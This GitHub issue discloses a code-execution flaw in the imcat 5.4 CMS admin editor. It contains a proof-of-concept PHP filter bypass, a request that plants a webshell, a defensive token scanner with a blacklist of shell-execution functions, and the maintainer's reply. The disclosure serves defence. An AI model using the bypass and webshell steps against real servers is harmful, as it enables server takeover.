Code Execution Vulnerability in the background of imcat5.4 #8

Open
haungtongfu opened this issue Jun 18, 2021 · 3 comments

@haungtongfu

1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: Code Execution

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

PS: a PHP 7.0.12 environment is recommended; other environments run into different problems when reproducing the vulnerability.

2. Source code analysis

In the background (admin area) of the CMS, an online source-code editing function is provided, and dangerous functions are filtered by the file imcat-5.4/imcat/core/glib/safscan.php. However, because the filtering rules of that function are incomplete, dangerous code can still be written and executed, producing a code-execution vulnerability. An attacker can gain control of the server through this vulnerability.

3. Reproduction

Use phpstudy to build the environment, then log in to the background of the website.

(1) Select Tool - DIY configuration - select any file to modify. I chose index.php here.

(2) Try to write a one-line webshell ("one-sentence Trojan").
Saving it produces an error, because the filter rule in the file imcat-5.4/imcat/core/glib/safscan.php is triggered.

(3) Try to write the following instead:

```php
<?php
// Assemble the function name at runtime so that the literal string
// "assert" never appears in the saved source.
$ch = explode(".", "hello.ass.world.er.t");
$c = $ch[1].$ch[3].$ch[4]; // "ass" . "er" . "t" == "assert"
$d = $_GET['x'];
$c($d); // assert($_GET['x']) evaluates the string as PHP code (PHP < 8.0)
```

Successfully bypassed.

(4) Visit
http://127.0.0.1/imcat/index.php?x= fputs(fopen('shell.php','w'),'')
This statement creates a shell.php file in the same directory as index.php and writes a one-line webshell ("one-sentence Trojan") into it.
Although the page shows an error, the statement has actually been executed successfully and shell.php has been generated in the same directory.

(5) Use AntSword to connect to

http://127.0.0.1/imcat/shell.php

4. Remediation suggestions

(1) Turn off the function for modifying source code in the background

(2) Perfect the rules of detection (this is hard to implement)
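The issue above demonstrates why a text-level blacklist fails: the word "assert" never appears in the saved file, only a variable call `$c($d)` whose target is built at runtime. The following script is an added example, not the imcat project's safscan.php or the reporter's code: it puts a naive regex blacklist beside a token-level check built on PHP's own lexer (`token_get_all`) and runs both over three constructed snippets, one of which is the bypass payload from step (3). The function names, the DANGEROUS list and the sample payloads are this example's own assumptions.

```php
<?php
// Added example (not imcat's code): a text-level blacklist beside a
// token-level scan, run over three constructed snippets. Function names,
// the DANGEROUS list and the sample payloads are all this example's own.
declare(strict_types=1);

const DANGEROUS = [
    'eval', 'assert', 'system', 'exec', 'passthru', 'shell_exec', 'popen',
    'proc_open', 'create_function', 'call_user_func', 'call_user_func_array',
];

// The weak check: a regex over the raw source for "<name>(".
// It never sees "assert" when the name is assembled at runtime.
function naive_scan(string $src): bool
{
    $pattern = '/\b(' . implode('|', DANGEROUS) . ')\s*\(/i';
    return preg_match($pattern, $src) === 1;
}

// Skip whitespace and comments to find the next significant token.
function next_significant(array $tokens, int $i): int
{
    $n = count($tokens);
    $skip = [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT];
    while ($i < $n && is_array($tokens[$i]) && in_array($tokens[$i][0], $skip, true)) {
        $i++;
    }
    return $i;
}

// The stronger check: tokenize with PHP's lexer and flag
//  - the eval construct and backtick shell execution,
//  - calls to blacklisted names,
//  - any variable function call "$x(...)", whose callee cannot be known
//    statically (this is exactly what "$c($d)" in the issue relies on).
function token_scan(string $src): array
{
    $findings = [];
    $inBacktick = false;
    $tokens = token_get_all($src);
    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $tok = $tokens[$i];
        if ($tok === '`') {
            if (!$inBacktick) {
                $findings[] = 'backtick shell execution';
            }
            $inBacktick = !$inBacktick;
            continue;
        }
        if (!is_array($tok)) {
            continue;
        }
        list($id, $text, $line) = $tok;
        if ($id === T_EVAL) {
            $findings[] = "line $line: eval";
            continue;
        }
        if ($id !== T_STRING && $id !== T_VARIABLE) {
            continue;
        }
        $j = next_significant($tokens, $i + 1);
        if ($j >= $n || $tokens[$j] !== '(') {
            continue; // not a call
        }
        if ($id === T_VARIABLE) {
            $findings[] = "line $line: variable function call $text(...)";
        } elseif (in_array(strtolower($text), DANGEROUS, true)) {
            $findings[] = "line $line: call to $text(...)";
        }
    }
    return $findings;
}

// Constructed samples: a direct call, the issue's bypass, and a benign file.
function sample_payloads(): array
{
    return [
        'direct' => "<?php assert(\$_GET['x']);",
        'bypass' => "<?php\n\$ch = explode('.', 'hello.ass.world.er.t');\n"
                  . "\$c = \$ch[1].\$ch[3].\$ch[4];\n\$d = \$_GET['x'];\n\$c(\$d);",
        'benign' => "<?php echo strtoupper('hello');",
    ];
}

foreach (sample_payloads() as $name => $src) {
    $findings = token_scan($src);
    printf("%-6s naive=%-5s token=%s\n", $name,
        naive_scan($src) ? 'BLOCK' : 'pass',
        $findings ? implode('; ', $findings) : 'pass');
}
```

Run with `php safscan_demo.php` (PHP 7.0 or later): the naive scan blocks `direct` but passes `bypass`, while the token scan reports the variable function call on line 5 of the bypass payload and leaves `benign` alone. Flagging every `$x(...)` is deliberately broad, and even so it is still a blacklist: functions that take a string callback (`array_map`, `preg_replace_callback`, `usort` and many others) remain an open-ended gap, which is why the thread's conclusion, disabling the DIY source editor by default, is the real fix rather than a better filter.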

@peacexie (Owner)

As you said: "Perfect the rules of detection (this is hard to implement)":
Good! This code runs before the filter code,
and in DIY mode you can remove the filter code too!

But you can use the master branch!
It is disabled by default in the master branch.

Sorry!
The DIY mode is disabled by default only in the master branch.
In v5.4, this feature was not updated.

@haungtongfu (Author)

I suggest that DIY be disabled by default. Good luck.

@haungtongfu (Author)

Can this vulnerability help me apply for a CVE? Thank you!
Requesting a CVE identification number - GitHub Docs

Thanks.
